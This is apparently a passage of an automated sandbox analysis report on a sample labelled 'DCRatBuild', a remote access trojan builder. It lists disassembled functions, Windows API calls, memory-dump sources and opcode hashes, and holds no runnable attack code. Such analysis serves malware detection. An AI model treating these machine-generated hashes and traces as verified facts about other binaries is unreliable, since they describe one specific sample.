                                                                                                                        • Opcode ID: 9ff7461893d18f697e13260c3873452ddb8a7842aa7109c9d02bcf622ababc81
                                                                                                                        • Instruction ID: 5ac416f7462c6813b0a5860740a5e77690287a5a1212e9d21cfc171ad3bf34b1
                                                                                                                        • Opcode Fuzzy Hash: 9ff7461893d18f697e13260c3873452ddb8a7842aa7109c9d02bcf622ababc81
                                                                                                                        • Instruction Fuzzy Hash: 85B012E6358000BC3184A1071D02E37020CC1D7B15330C02FFD28C60C4DC4C4C05063F
                                                                                                                        Function 004AE419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE3FC
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-0
                                                                                                                        • Opcode ID: ffe1b6e1131de524be6166dad6d9171db1f1f618bd7e6e2f256d3a1a4760f17e
                                                                                                                        • Instruction ID: 1f14a716a26eb3d06206faaa0bb212d9c21a7b73ffa80c51151dabee4d0a318c
                                                                                                                        • Opcode Fuzzy Hash: ffe1b6e1131de524be6166dad6d9171db1f1f618bd7e6e2f256d3a1a4760f17e
                                                                                                                        • Instruction Fuzzy Hash: CDB012E53580007C318461071E02E37020CC1D7B15330C02FFA28C60C4DC4C0C0A063F
                                                                                                                        Function 004AE423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE3FC
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-0
                                                                                                                        • Opcode ID: 491b81a5b05e451922fee76e71e648b2f94a2efe125fa4dbd82e1b761e929e01
                                                                                                                        • Instruction ID: b6734cf9ff7e59625239c99804599aeaaf4ce19fa62aed521e83a182d1217387
                                                                                                                        • Opcode Fuzzy Hash: 491b81a5b05e451922fee76e71e648b2f94a2efe125fa4dbd82e1b761e929e01
                                                                                                                        • Instruction Fuzzy Hash: 7AB092A5258000BC2144A1065902E370208C196B15330C02FF828C6085D84C4A01063F
                                                                                                                        Function 004AE3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE3FC
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-0
                                                                                                                        • Opcode ID: 375947cc706391214d907e966c4379b124777291110c11dea190b0b6b24522ac
                                                                                                                        • Instruction ID: dcec842289d0d85fbdda975705b0c3dc41928361a4fe9abe6aea359aee9e356f
                                                                                                                        • Opcode Fuzzy Hash: 375947cc706391214d907e966c4379b124777291110c11dea190b0b6b24522ac
                                                                                                                        • Instruction Fuzzy Hash: 5CA011EA2A80023C300822032E02E3B020CC0E2B28330802FF838AA0C0AC8C08020A3F
                                                                                                                        Function 004AE446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE3FC
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-0
                                                                                                                        • Opcode ID: ee146279d84b6e11ac65e4ead98385b2130499bdb9a82b60cd7dac215c04e91e
                                                                                                                        • Instruction ID: b3c323eed7e345ba9ef012b06f801bad2978525c71b7627a435c07b733dad215
                                                                                                                        • Opcode Fuzzy Hash: ee146279d84b6e11ac65e4ead98385b2130499bdb9a82b60cd7dac215c04e91e
                                                                                                                        • Instruction Fuzzy Hash: D2A012E52580017C300421031D02D37020CC0D6B14330841FF825850C0584C0801053F
                                                                                                                        Function 004AE40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE3FC
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-0
                                                                                                                        • Opcode ID: babbdede5e4478322212316f4d838277884bc23fae31aaece6901b5097e9e11c
                                                                                                                        • Instruction ID: b3c323eed7e345ba9ef012b06f801bad2978525c71b7627a435c07b733dad215
                                                                                                                        • Opcode Fuzzy Hash: babbdede5e4478322212316f4d838277884bc23fae31aaece6901b5097e9e11c
                                                                                                                        • Instruction Fuzzy Hash: D2A012E52580017C300421031D02D37020CC0D6B14330841FF825850C0584C0801053F
                                                                                                                        Function 004AE414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE3FC
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-0
                                                                                                                        • Opcode ID: f7dc657e0dd5a82482c082f178a03d8f1eb654bccff4d2ea5b3ccc523ff426f1
                                                                                                                        • Instruction ID: b3c323eed7e345ba9ef012b06f801bad2978525c71b7627a435c07b733dad215
                                                                                                                        • Opcode Fuzzy Hash: f7dc657e0dd5a82482c082f178a03d8f1eb654bccff4d2ea5b3ccc523ff426f1
                                                                                                                        • Instruction Fuzzy Hash: D2A012E52580017C300421031D02D37020CC0D6B14330841FF825850C0584C0801053F
                                                                                                                        Function 004AE43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE3FC
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-0
                                                                                                                        • Opcode ID: a013c592a3a978f548a681e9255e6636b1c2bf249d7a0e44480fc0d738bdbcb1
                                                                                                                        • Instruction ID: b3c323eed7e345ba9ef012b06f801bad2978525c71b7627a435c07b733dad215
                                                                                                                        • Opcode Fuzzy Hash: a013c592a3a978f548a681e9255e6636b1c2bf249d7a0e44480fc0d738bdbcb1
                                                                                                                        • Instruction Fuzzy Hash: D2A012E52580017C300421031D02D37020CC0D6B14330841FF825850C0584C0801053F
                                                                                                                        Function 004AE432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 004AE3FC
                                                                                                                          • Part of subcall function 004AE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 004AE8D0
                                                                                                                          • Part of subcall function 004AE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 004AE8E1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1269201914-0
                                                                                                                        • Opcode ID: d955060c99da30b1258b6df82087732124e82987371cbc74c255a7c10e162263
                                                                                                                        • Instruction ID: b3c323eed7e345ba9ef012b06f801bad2978525c71b7627a435c07b733dad215
                                                                                                                        • Opcode Fuzzy Hash: d955060c99da30b1258b6df82087732124e82987371cbc74c255a7c10e162263
                                                                                                                        • Instruction Fuzzy Hash: D2A012E52580017C300421031D02D37020CC0D6B14330841FF825850C0584C0801053F
                                                                                                                        Function 00499F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetEndOfFile.KERNELBASE(?,0049903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00499F0C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 749574446-0
                                                                                                                        • Opcode ID: c631552f5ac040aa239e5822e9896132178bdabebed8fb007472e924367804ad
                                                                                                                        • Instruction ID: 288868d586d2c5609ff8965e305f86cbc537c035a37c4c37e1bb6c10b53ad084
                                                                                                                        • Opcode Fuzzy Hash: c631552f5ac040aa239e5822e9896132178bdabebed8fb007472e924367804ad
                                                                                                                        • Instruction Fuzzy Hash: AFA0243004000D47CD401F31CD0444C3710F7117C130041F45007CF071C7134407C704
                                                                                                                        Function 004AAC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetCurrentDirectoryW.KERNELBASE(?,004AAE72,C:\Users\user\Desktop,00000000,004D946A,00000006), ref: 004AAC08
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectory
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1611563598-0
                                                                                                                        • Opcode ID: 8c3a17734934ad4c7b9d5ceab28aef7d936e35d301e786b41fb7e925bb7ba741
                                                                                                                        • Instruction ID: ad1080f3e12bf685c1d356fe28db6fa8d3527fe9a85c75ac8f50124465a949d9
                                                                                                                        • Opcode Fuzzy Hash: 8c3a17734934ad4c7b9d5ceab28aef7d936e35d301e786b41fb7e925bb7ba741
                                                                                                                        • Instruction Fuzzy Hash: AEA011302002008B82802F328F0AA0EBAAAAFA2B02F08C038A08080030CB30C820AA08
                                                                                                                        Function 00499620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CloseHandle.KERNELBASE(000000FF,?,?,004995D6,?,?,?,?,?,004C2641,000000FF), ref: 0049963B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2962429428-0
                                                                                                                        • Opcode ID: a695dd8e4981119fbdd43799e076c189a8d1338f2cf1cc84828caa7838d9931a
                                                                                                                        • Instruction ID: 22c078e863c28dd5eac3e5fa9a00dbdda731b16a78bce51274bad6762527a6aa
                                                                                                                        • Opcode Fuzzy Hash: a695dd8e4981119fbdd43799e076c189a8d1338f2cf1cc84828caa7838d9931a
                                                                                                                        • Instruction Fuzzy Hash: FAF0E970081B159FDF308A28C458B937BE86B13322F044B2FD0E242AE0D3686D8D8A44

                                                                                                                        Non-executed Functions

                                                                                                                        Function 004AC220 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 286timewindowfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00491316: GetDlgItem.USER32(00000000,00003021), ref: 0049135A
                                                                                                                          • Part of subcall function 00491316: SetWindowTextW.USER32(00000000,004C35F4), ref: 00491370
                                                                                                                        • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 004AC2B1
                                                                                                                        • EndDialog.USER32(?,00000006), ref: 004AC2C4
                                                                                                                        • GetDlgItem.USER32(?,0000006C), ref: 004AC2E0
                                                                                                                        • SetFocus.USER32(00000000), ref: 004AC2E7
                                                                                                                        • SetDlgItemTextW.USER32(?,00000065,?), ref: 004AC321
                                                                                                                        • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 004AC358
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 004AC36E
                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004AC38C
                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 004AC39C
                                                                                                                        • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 004AC3B8
                                                                                                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 004AC3D4
                                                                                                                        • _swprintf.LIBCMT ref: 004AC404
                                                                                                                          • Part of subcall function 00494092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004940A5
                                                                                                                        • SetDlgItemTextW.USER32(?,0000006A,?), ref: 004AC417
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 004AC41E
                                                                                                                        • _swprintf.LIBCMT ref: 004AC477
                                                                                                                        • SetDlgItemTextW.USER32(?,00000068,?), ref: 004AC48A
                                                                                                                        • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 004AC4A7
                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 004AC4C7
                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 004AC4D7
                                                                                                                        • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 004AC4F1
                                                                                                                        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 004AC509
                                                                                                                        • _swprintf.LIBCMT ref: 004AC535
                                                                                                                        • SetDlgItemTextW.USER32(?,0000006B,?), ref: 004AC548
                                                                                                                        • _swprintf.LIBCMT ref: 004AC59C
                                                                                                                        • SetDlgItemTextW.USER32(?,00000069,?), ref: 004AC5AF
                                                                                                                          • Part of subcall function 004AAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 004AAF35
                                                                                                                          • Part of subcall function 004AAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,004CE72C,?,?), ref: 004AAF84
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                                        • String ID: %s %s$%s %s %s$PJ$REPLACEFILEDLG
                                                                                                                        • API String ID: 797121971-4073223090
                                                                                                                        • Opcode ID: 4f3bddb64647147ad8ca5e3e08da67cd3139341d5b5ea46a002e75b69e9d60b4
                                                                                                                        • Instruction ID: 2ec48457ce7372fc327b3d582c62a2df3a425f25286e1c5f17ca23e8ae3e6711
                                                                                                                        • Opcode Fuzzy Hash: 4f3bddb64647147ad8ca5e3e08da67cd3139341d5b5ea46a002e75b69e9d60b4
                                                                                                                        • Instruction Fuzzy Hash: 2591D872548344BFD261DFA1CC89FFB77ACEB5A705F44482AF745D2081DB39AA04872A
                                                                                                                        Function 00496FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00496FAA
                                                                                                                        • _wcslen.LIBCMT ref: 00497013
                                                                                                                        • _wcslen.LIBCMT ref: 00497084
                                                                                                                          • Part of subcall function 00497A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00497AAB
                                                                                                                          • Part of subcall function 00497A9C: GetLastError.KERNEL32 ref: 00497AF1
                                                                                                                          • Part of subcall function 00497A9C: CloseHandle.KERNEL32(?), ref: 00497B00
                                                                                                                          • Part of subcall function 0049A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0049977F,?,?,004995CF,?,?,?,?,?,004C2641,000000FF), ref: 0049A1F1
                                                                                                                          • Part of subcall function 0049A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0049977F,?,?,004995CF,?,?,?,?,?,004C2641), ref: 0049A21F
                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00497139
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00497155
